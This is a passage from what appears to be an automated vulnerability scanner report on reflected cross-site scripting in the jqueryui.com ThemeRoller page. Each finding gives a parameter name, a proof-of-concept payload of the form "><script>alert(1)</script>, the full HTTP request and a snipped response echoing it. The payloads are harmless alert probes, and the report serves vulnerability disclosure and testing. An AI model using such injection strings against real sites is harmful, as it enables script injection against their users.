The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f4c"><script>alert(1)</script>634ec3d6ef was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em80f4c"><script>alert(1)</script>634ec3d6ef&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em80f4c"><script>alert(1)</script>634ec3d6ef&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_
...[SNIP]...

1.116. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a441"><script>alert(1)</script>e8b3746f1f8 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold4a441"><script>alert(1)</script>e8b3746f1f8&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold4a441"><script>alert(1)</script>e8b3746f1f8&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTe
...[SNIP]...

1.117. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14d79"><script>alert(1)</script>6fce8723dd7 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd0114d79"><script>alert(1)</script>6fce8723dd7&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd0114d79"><script>alert(1)</script>6fce8723dd7&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png
...[SNIP]...

1.118. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3420"><script>alert(1)</script>b2a0d8950b9 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdda3420"><script>alert(1)</script>b2a0d8950b9&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdda3420"><script>alert(1)</script>b2a0d8950b9&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

1.119. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5febe"><script>alert(1)</script>977976b6be5 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d55febe"><script>alert(1)</script>977976b6be5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d55febe"><script>alert(1)</script>977976b6be5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityAct
...[SNIP]...

1.120. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c777"><script>alert(1)</script>19a80c4851a was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a8c777"><script>alert(1)</script>19a80c4851a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a8c777"><script>alert(1)</script>19a80c4851a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

1.121. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85187"><script>alert(1)</script>054e8a7d848 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f385187"><script>alert(1)</script>054e8a7d848&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f385187"><script>alert(1)</script>054e8a7d848&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&
...[SNIP]...

1.122. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b5a7"><script>alert(1)</script>e3691bf26a5 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff6b5a7"><script>alert(1)</script>e3691bf26a5&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ve=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff6b5a7"><script>alert(1)</script>e3691bf26a5&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

1.123. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab976"><script>alert(1)</script>e10766f4522 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0ab976"><script>alert(1)</script>e10766f4522&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0ab976"><script>alert(1)</script>e10766f4522&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI
...[SNIP]...

1.124. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ee58"><script>alert(1)</script>e852cc5eefd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?1ee58"><script>alert(1)</script>e852cc5eefd=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
